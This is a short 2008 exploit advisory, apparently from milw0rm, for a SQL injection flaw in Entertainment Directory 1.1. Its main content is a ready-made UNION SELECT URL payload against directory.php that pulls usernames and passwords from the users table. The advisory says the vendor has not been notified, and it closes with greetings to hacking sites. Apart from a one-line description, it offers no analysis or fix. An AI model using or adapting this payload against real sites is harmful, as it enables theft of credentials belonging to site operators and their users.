Entertainment Directory 1.1 SQL Injection Vulnerability.pdf

1 −−==+================================================================================+==−− 2 −−==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==−− 3 −−==+================================================================================+==−− 4 5 6 7 Discovered By: t0pP8uZz & xprog 8 Discovered On: 5 April 2008 9 Script Download: http://www.turnkeyzone.com 10 DORK: N/A 11 Vendor Has Not Been Notified! 12 13 14 DESCRIPTION: 15 Entertainment directory is vulnerable due to a insecure mysql query. this allows the remote attacker 16 to obtain user credentials from the database. 17 18 19 EXPLOITS: 20 http://site.com/directory.php?cat=−1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9, 10,11,12,13,14/**/FROM/**/users/* 21 22 23 24 NOTE/TIP: 25 26 27 GREETZ: milw0rm.com, h4ck−y0u.org, CipherCrew! 28 29 30 31 −−==+================================================================================+==−− 32 −−==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==−− 33 −−==+================================================================================+==−− 34 35 # milw0rm.com [2008−04−05] Page 1/1 Entertainment Directory 1.1 SQL Injection Vulnerability t0pP8uZz 04/05/2008